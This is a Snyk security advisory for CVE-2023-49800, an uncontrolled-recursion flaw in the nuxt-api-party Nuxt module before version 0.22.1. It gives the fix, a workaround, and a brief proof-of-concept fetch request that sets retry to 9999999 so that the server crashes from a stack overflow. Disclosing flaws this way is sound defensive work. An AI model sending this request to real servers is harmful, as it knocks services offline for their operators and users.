Uncontrolled Recursion Affecting nuxt-api-party package, versions <0.22.1
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.05% (17th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JS-NUXTAPIPARTY-6115221
- published 11 Dec 2023
- disclosed 9 Dec 2023
- credit OhB00
Introduced: 9 Dec 2023
CVE-2023-49800 Open this link in a new tabHow to fix?
Upgrade nuxt-api-party
to version 0.22.1 or higher.
Overview
nuxt-api-party is a Nuxt 3 module to securely connect with any API
Affected versions of this package are vulnerable to Uncontrolled Recursion due to an abuse on the retry logic in ofetch
function. An attacker can cause the server to crash from a stack overflow by sending a crafted request with a high number of retry attempts for a URL known to fail.
Workaround
Limit which options can be passed to ofetch
.
PoC
await fetch("http://localhost:3000/api/__api_party/MyEndpoint", {
method: "POST",
body: JSON.stringify({ path: "x:x", retry: 9999999 }),
headers: { "Content-Type": "application/json" }
})
References
CVSS Scores
version 3.1